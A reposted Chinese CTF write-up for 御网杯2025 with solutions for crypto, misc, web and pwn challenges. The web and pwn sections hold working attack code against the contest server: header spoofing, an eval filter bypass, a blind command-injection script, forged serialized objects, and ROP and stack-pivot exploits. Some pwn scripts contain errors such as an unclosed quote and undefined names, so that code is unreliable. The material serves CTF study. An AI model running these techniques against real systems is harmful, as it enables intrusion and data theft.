2026-01-28 06:54:42 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文提供了御网杯2025CTF赛事的WriteUp，涵盖Crypto、Misc、Web及Pwn四个方向。作者认为赛题偏向基础，适合新手训练。文中详细记录了RSA计算、隐写分析、XFF伪造、命令注入绕过及栈迁移等解题过程，并给出了Python脚本与Payload，有助于CTF初学者理解相关安全技术的实际应用。 综合评分： 75 文章分类： CTF,WEB安全,二进制安全,实战经验

base64解密拿到flag

flag{HNCTFmZ5bM1ZYAi7}

easy_misc

解题思路

十进制转字符 -> base64解码 -> rot13

From Decimal, From Base64, From Base58 – CyberChef

flag{HNCTF2ypZRYzFeH6U}

套娃

解题思路

附件第一步套娃.xlsx改为套娃.zip然后解压

解压得到套娃.txt，然后还是改成.zip

发现这是Word文档的特征，于是后缀改成.docx

flag被改成白色了

flag{HNCTF0hZFXnNia}

Web

YWB_Web_xff

题目代码

<!DOCTYPE&nbsp;html>
<html&nbsp;lang="zh-CN">
<head>
&nbsp; &nbsp;&nbsp;<meta&nbsp;charset="UTF-8">
&nbsp; &nbsp;&nbsp;<meta&nbsp;name="viewport"&nbsp;content="width=device-width, initial-scale=1.0">
&nbsp; &nbsp;&nbsp;<title>企业门户登录系统</title>
&nbsp; &nbsp;&nbsp;<link&nbsp;rel="stylesheet"&nbsp;href="style.css">
</head>
<body>
&nbsp; &nbsp;&nbsp;<div&nbsp;class="background"></div>
&nbsp; &nbsp;&nbsp;<div&nbsp;class="container">
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<div&nbsp;class="header">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<h1>企业门户登录系统</h1>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<p>欢迎使用企业门户系统</p>
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</div>
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<div&nbsp;class="content">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<form&nbsp;class="login-form"&nbsp;method="post"&nbsp;action="">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<div&nbsp;class="form-group">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<label&nbsp;for="username">用户名</label>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<input&nbsp;type="text"&nbsp;id="username"&nbsp;name="username"&nbsp;required>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</div>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<div&nbsp;class="form-group">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<label&nbsp;for="password">密码</label>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<input&nbsp;type="password"&nbsp;id="password"&nbsp;name="password"&nbsp;required>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</div>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<button&nbsp;type="submit"&nbsp;class="login-btn">登录</button>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</form>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<?php
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;($_SERVER["REQUEST_METHOD"] ==&nbsp;"POST") {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;($cip ==&nbsp;"2.2.2.1") {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo&nbsp;'<div class="success">';
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo&nbsp;'<h2>登录成功！</h2>';
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $flag = file_get_contents('/flag.txt');
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo&nbsp;'<p>flag{'&nbsp;. htmlspecialchars($flag) .&nbsp;'}</p>';
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo&nbsp;'</div>';
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo&nbsp;'<div class="error">';
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo&nbsp;'<h2>登录失败</h2>';
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo&nbsp;'<p>IP地址验证失败</p>';
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo&nbsp;'<p>当前IP: '&nbsp;. htmlspecialchars($cip) .&nbsp;'</p>';
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo&nbsp;'</div>';
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;?>
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</div>
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<div&nbsp;class="footer">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<p>© 2024 企业门户系统 | 技术支持</p>
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</div>
&nbsp; &nbsp;&nbsp;</div>
</body>
</html>

解题思路

通过源码得知要使用post请求传入ip2.2.2.1

解题代码

curl -X POST http://47.105.113.86:40001/ -H&nbsp;"X-Forwarded-For: 2.2.2.1"

flag{9u60w1kemajt}

YWB_Web_命令执行过滤绕过

题目代码

<?php

\# flag in flag.php
include("flag.php");

if&nbsp;(isset($_GET['cmd'])) {
&nbsp; &nbsp; $cmd = $_GET['cmd'];

&nbsp; &nbsp;&nbsp;if&nbsp;(!preg_match("/system|exec|highlight|show_source|include|passthru|echo|print_r|cat|head|tail|more|less/i", $cmd)) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(preg_match("/flag/i", $cmd)) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;eval($cmd);
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;die("HACK!!");
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }&nbsp;else&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;die("HACK!!!");
&nbsp; &nbsp; }
}&nbsp;else&nbsp;{
&nbsp; &nbsp; highlight_file(__FILE__);
}

?>

解题思路

由题可知要进行命令执行过滤绕过

先尝试flag.php

发现在/tmp/flag.nisp中再次构造

解题代码

curl&nbsp;"http://47.105.113.86:40002/index.php?cmd=var_dump($flag);//flag"

curl&nbsp;"47.105.113.86:40002/index.php?cmd=var_dump(file_get_contents('/tmp/flag.nisp'));//flag"

flag{rpuqari28i9l}

easyweb

题目代码

<?php

if&nbsp;(isset($_POST['cmd'])) {
&nbsp; &nbsp; @exec($_POST['cmd'], $res, $rc);
&nbsp; &nbsp;&nbsp;// echorc;
}&nbsp;else&nbsp;{
&nbsp; &nbsp;&nbsp;echo&nbsp;"It works!";
}

show_source(__FILE__);

?>

解题思路

访问页面，发现源代码阅读代码需要用post请求来访问，提示flag在/flag.txt中的文件中，写出时间盲注脚本

解题代码

import&nbsp;requests
import&nbsp;time

TARGET_URL =&nbsp;"http://47.105.113.86:40005/"
FLAG_CHARSET =&nbsp;"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_{}-"
TIMEOUT_THRESHOLD =&nbsp;3&nbsp;&nbsp;# 延迟阈值（秒）
MAX_FLAG_LENGTH =&nbsp;50&nbsp;&nbsp;# 假设flag最大长度
REQUEST_TIMEOUT = TIMEOUT_THRESHOLD +&nbsp;2&nbsp;&nbsp;# 请求超时时间

def&nbsp;check_char(position, char):
&nbsp; &nbsp;&nbsp;"""检查指定位置的字符是否匹配"""
&nbsp; &nbsp; cmd =&nbsp;f"if [ $(cut -b&nbsp;{position}&nbsp;/flag.txt) = '{char}' ]; then sleep&nbsp;{TIMEOUT_THRESHOLD}; fi"
&nbsp; &nbsp;&nbsp;try:
&nbsp; &nbsp; &nbsp; &nbsp; start_time = time.time()
&nbsp; &nbsp; &nbsp; &nbsp; requests.post(TARGET_URL, data={"cmd": cmd}, timeout=REQUEST_TIMEOUT)
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;time.time() - start_time >= TIMEOUT_THRESHOLD
&nbsp; &nbsp;&nbsp;except&nbsp;requests.exceptions.RequestException:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;main():
&nbsp; &nbsp; flag =&nbsp;""
&nbsp; &nbsp;&nbsp;for&nbsp;position&nbsp;in&nbsp;range(1, MAX_FLAG_LENGTH +&nbsp;1):
&nbsp; &nbsp; &nbsp; &nbsp; char_found =&nbsp;False

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;char&nbsp;in&nbsp;FLAG_CHARSET:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;check_char(position, char):
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; flag += char
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; char_found =&nbsp;True
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; print(f"[+] Current flag:&nbsp;{flag}")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;char_found:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; print("[!] No more characters found, exiting...")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break

&nbsp; &nbsp; print(f"\n[+] Final flag:&nbsp;{flag}")

if&nbsp;__name__ ==&nbsp;"__main__":
&nbsp; &nbsp; main()

flag{d4ek6s7kzztx}

YWB_Web_未授权访问

解题思路

可以看到默认cookie是O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22guest%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A0%3B%7D

URL解码后是user=O:5:"Admin":2:{s:4:"name";s:5:"guest";s:7:"isAdmin";b:0;}

因此将其修改成O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3B%7D重新访问

flag{zo84fpgxr98h}

YWB_Web_反序列化

题目代码

<?php
function&nbsp;filter($name){
&nbsp; &nbsp; $safe =&nbsp;array("flag",&nbsp;"php");
&nbsp; &nbsp;&nbsp;return&nbsp;str_replace($safe,&nbsp;"hack", $name);
}

class&nbsp;mylogin&nbsp;{
&nbsp; &nbsp;&nbsp;var&nbsp;$user;
&nbsp; &nbsp;&nbsp;var&nbsp;$pass;

&nbsp; &nbsp;&nbsp;function&nbsp;__construct($user, $pass)&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$this->user = $user;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$this->pass = $pass;
&nbsp; &nbsp; }
}

if&nbsp;($_POST['msg']) {
&nbsp; &nbsp; $filtered_input = filter($_POST['msg']);

&nbsp; &nbsp; $a = unserialize($filtered_input);

&nbsp; &nbsp;&nbsp;if&nbsp;($a&nbsp;instanceof&nbsp;mylogin) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;($a->pass ===&nbsp;"myzS@11wawq") {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit();
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $tis =&nbsp;"您是小自吧，差一点就成功了!";
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }&nbsp;else&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; $tis =&nbsp;"您输入的信息可能去非洲才能找到哦!";
&nbsp; &nbsp; }
}
?>

解题思路

看到代码就得明白，filter()仅仅是不让你非预期拿到flag，所以解题主要还在下面的反序列化上。这里user可以随便输入，pass必须得是myzS@11wawq，其它就没有什么需要注意的了，直接写代码构造一个对象，然后输出序列化后的数据，最后输入给服务器就可以拿到flag了。

解题代码

<?php
class&nbsp;mylogin&nbsp;{
&nbsp; &nbsp;&nbsp;var&nbsp;$user;
&nbsp; &nbsp;&nbsp;var&nbsp;$pass;
}

// 创建新的对象
$obj =&nbsp;new&nbsp;mylogin();
$obj->user =&nbsp;"admin"; &nbsp;// 用户名可任意
$obj->pass =&nbsp;"myzS@11wawq";

// 序列化
echo&nbsp;serialize($obj);
?>

O:7:"mylogin":2:{s:4:"user";s:5:"admin";s:4:"pass";s:11:"myzS@11wawq";}

flag{ptn4pymi1h7o}

Pwn

Canary

解题思路

如图

解题代码

from&nbsp;pwn&nbsp;import&nbsp;*
from&nbsp;ctypes&nbsp;import&nbsp;*
from&nbsp;LibcSearcher&nbsp;import&nbsp;*
p = remote('47.105.113.86',30001)
# p = remote('192-168-1-40.pvp4566.bugku.cn',9999)
# p = process('./attachment-8')
context.clear(arch='amd64',os =&nbsp;'linux',log_level =&nbsp;'debug')
# context.terminal = ['tmux', 'new-window']
r =&nbsp;lambda&nbsp;: p.recv()
rl =&nbsp;lambda&nbsp;: p.recvline()
rc =&nbsp;lambda&nbsp;x: p.recv(x)
ru =&nbsp;lambda&nbsp;x: p.recvuntil(x)
rud =&nbsp;lambda&nbsp;x: p.recvuntil(x, drop=True)
s =&nbsp;lambda&nbsp;x: p.send(x)
sl =&nbsp;lambda&nbsp;x: p.sendline(x)
sa =&nbsp;lambda&nbsp;x, y: p.sendafter(x, y)
sla =&nbsp;lambda&nbsp;x, y: p.sendlineafter(x, y)
shell =&nbsp;lambda&nbsp;: p.interactive()
pr =&nbsp;lambda&nbsp;name,x : log.info(name+':'+hex(x))
bd=0x401581
payload=b'a'*104+p64(0)+p64(0)+p64(bd)
sla(b'choice',b'1')
sla(b'code',payload)
sla(b'choice,b'2')
sl(b'3')
shell()

flag{1718540cbc6107c443d227156e50bd72}

ez_pwn

解题思路

栈迁移

解题代码

from&nbsp;pwn&nbsp;import&nbsp;*
from&nbsp;ctypes&nbsp;import&nbsp;*
from&nbsp;LibcSearcher&nbsp;import&nbsp;*
p = remote('47.105.113.86',30003)
# p = remote('192-168-1-40.pvp4566.bugku.cn',9999)
# p = process('./attachment-8')
libc = ELF('./libc-2.31.so')
context.clear(arch='amd64',os =&nbsp;'linux',log_level =&nbsp;'debug')
# context.terminal = ['tmux', 'new-window']
r =&nbsp;lambda&nbsp;: p.recv()
rl =&nbsp;lambda&nbsp;: p.recvline()
rc =&nbsp;lambda&nbsp;x: p.recv(x)
ru =&nbsp;lambda&nbsp;x: p.recvuntil(x)
rud =&nbsp;lambda&nbsp;x: p.recvuntil(x, drop=True)
s =&nbsp;lambda&nbsp;x: p.send(x)
sl =&nbsp;lambda&nbsp;x: p.sendline(x)
sa =&nbsp;lambda&nbsp;x, y: p.sendafter(x, y)
sla =&nbsp;lambda&nbsp;x, y: p.sendlineafter(x, y)
shell =&nbsp;lambda&nbsp;: p.interactive()
read_got = elf.got['read']
wirte_plt = elf.plt['write']
main =&nbsp;0x4011E9
bss_addr =&nbsp;0x404000
rdi=0x4012c3
rsi_r15=0x4012c1
rbp=0x40117d
pay =&nbsp;b'a'*0x20+p64(bss_addr+0x300)+p64(rdi)+p64(2)+p64(rsi_r15)+p64(read_got)+p64(0)+p64(write_plt)+p64(main)
sla(b'now',pay)
readl_addr = u64(rc(6).ljust(0x8,b'a')) -&nbsp;0x110fa0
payload2=b'a'*0x28+p64(0x4012bc)+p64(0)*4+p64(0xe6aee+real_addr)
sl(payload2)
shell()

flag{a51a3bdf23919f677efccd90270da72f}

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：赛查查《御网杯2025 WriteUp》